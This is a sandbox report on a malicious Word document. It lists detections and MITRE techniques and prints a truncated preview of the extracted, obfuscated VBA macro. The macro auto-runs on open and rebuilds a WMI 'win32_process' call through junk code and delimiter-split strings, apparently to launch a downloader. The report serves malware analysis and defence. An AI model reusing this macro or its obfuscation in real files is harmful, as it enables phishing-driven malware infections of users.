Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and configured to execute obfuscated VBA code. This code likely attempts to download and execute a second-stage payload, a common technique for malware delivery. The presence of VBA macros and the auto-execution of code via Document_Open strongly suggest a spearphishing attachment attack vector.
Heuristics (6)
- ClamAV: Doc.Malware.Generic-7546200-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-7546200-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8277 bytes |

SHA-256 (macros.bas): 8d1972f99526095b3a55bd672660629ff7455da915bcd736e510b77e56712c1c

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Efferdrq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Kkapcimmcib
End Sub
Attribute VB_Name = "Liyhzkoypfma"
Attribute VB_Base = "0{9EAF311C-2718-452D-A0C8-FA5FE42E91CD}{A1B926CD-2F01-4610-AAFB-2667E6E9D565}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mojacpyniebzf"
Function Uizzoslddbphd()
Select Case Utpetecknx
Case Dqoulumteo
Hnldhwcv = 7
Earvwczdeeqc = Atn(4)
Gpnnwrhghlwfs = Sin(Rvevmloc)
Case Kubkhmfplwrjo
Kxsgyrjaznjmg = Log(3)
Snxpmxfwayr = 6
Cmhgfxbnv = CSng(Gatbwxzydxed)
Case Maebshhbcynfc
Kzwrfilddz = ChrW(Tljxiuisxwmdo)
Yvorvrpty = 1
Gqawbbpjop = Cos(Ekuplnmt)
End Select
Xkitwdsxnv = ChrW(wdKeyP)
Select Case Jckyesnkijkyg
Case Qbyjlijtt
Zhiawowjdcsh = 7
Ypteshxldc = Atn(4)
Cgpajqbk = Sin(Bhnwcxxey)
Case Amtppapwnegwt
Tdtbfopsnlq = Log(3)
Aozdkebtw = 6
Qlofbvltjmdt = CSng(Nklufeyekwzec)
Case Lwxtzkuakqs
Mswuofwtqzqgv = ChrW(Sfwszeyq)
Lmtkadne = 1
Szfqwpvuwgmd = Cos(Hftzasncqudt)
End Select
Xrpnoikzydum = Xkitwdsxnv + Liyhzkoypfma.Ascdvumitfenw + Liyhzkoypfma.Eoztejoiiemfn
Select Case Roqxknavfs
Case Zlhkqolyoqfq
Smkrudxukr = 7
Elkunrkcslp = Atn(4)
Irzvaiad = Sin(Okoyaueapgbj)
Case Ucofqthxwpl
Zjiekgqvjzski = Log(3)
Zhzzqkayuu = 6
Nqnymnwfq = CSng(Rckskcvv)
Case Wxpqmwnyl
Xcdewbfwmh = ChrW(Eixgrqvzyeyr)
Iarihfsttzgno = 1
Zwybdlhppvi = Cos(Ktellxtfeda)
End Select
losd = Liyhzkoypfma.Ofrxmena.GroupName
Tfnnlhmaf = Split(Xrpnoikzydum + LTrim(losd), "//====dsfnnJJJsm388//=")
Select Case Wpqzhgpqtcwne
Case Pmqwkehw
Hwjaqujgxgzl = 7
Ewjkmfpireez = Atn(4)
Ivotofajfqdhn = Sin(Qedhwroux)
Case Eyffvqpnycrfx
Vqthfribazas = Log(3)
Ubrjqbbd = 6
Mraieyzghdwx = CSng(Egvxffvxhid)
Case Whysrpzvnqaxc
Lfhwacfjgeyu = ChrW(Krecydzjkfi)
Rpuzcebmcbha = 1
Xrotuzgdywu = Cos(Ubucozhoulevq)
End Select
Uizzoslddbphd = Tnakagfgnfgdi + Join(Tfnnlhmaf, "") + Tnakagfgnfgdi
Select Case Irdwcaskbv
Case Vqvrrbtykbs
Itolzndppj = 7
Nhyscmmruwtev = Atn(4)
Uczgzgmtheyc = Sin(Zfhiueuuf)
Case Gfpmzkqutim
Mqanrodk = Log(3)
Uqmvaazaxr = 6
Bwhhuihpwnpe = CSng(Dgdreectu)
Case Ppttipyktpe
Uucophahyw = ChrW(Xgnnqhcmteto)
Yrucpzztwjb = 1
Nugqswbl = Cos(Xdhbuppbos)
End Select
End Function
Function Kkapcimmcib()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Liyhzkoypfma.Bnsaodxiii + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
Select Case Upumvpzkxekc
Case Irybjkbwl
Gxnovzcxggkb = 7
Ecgavqkz = Atn(4)
Ghbbutyeyr = Sin(Mvbeieuzxqmy)
Case Uvqfkgbbi
Acnhgcunmpkzq = Log(3)
Ewopucvmy = 6
Shjqlnmfhbh = CSng(Nsktskwzwdb)
Case Stvfqoeskm
Ewmkbexdxbcrc = ChrW(Govdhlyutkb)
Nxdfgxnnkouz = 1
Orrddvax = Cos(Jwkfctazsep)
End Select
E = "//====dsfnnJJJsm388//="
Select Case Uopbqqll
Case Tteplijtsfojw
Ircanjhaz = 7
Qikkhncfsm = Atn
... (truncated)